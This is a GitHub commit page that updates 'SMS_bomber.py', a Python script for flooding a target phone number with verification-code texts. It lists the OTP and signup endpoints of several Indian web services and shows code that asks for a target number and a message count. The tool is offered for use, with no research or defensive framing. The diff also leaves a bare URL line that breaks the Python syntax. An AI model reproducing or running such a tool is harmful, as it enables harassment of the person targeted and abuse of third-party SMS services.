Update SMS_bomber.py

This commit is contained in:
Mohmmadyahya 2017-10-31 16:01:11 +05:30 committed by GitHub
parent bfc8e828d6
commit 3154a31d5e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 1 deletions

View File

@ -32,6 +32,7 @@ def banner():
#http://www.quikr.com/SignIn?aj=1&for=send_otp&user=
https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=
def send(num, counter, slep):
#url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="]
url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile="
@ -48,4 +49,6 @@ try:
banner()
send(input("Enter Target Number : "), int(input("Enter Number of Messages : ")), 1)
except Exception as e:
print("Something is wrong please Re-run this script.")
print("Something is wrong please Re-run this script.")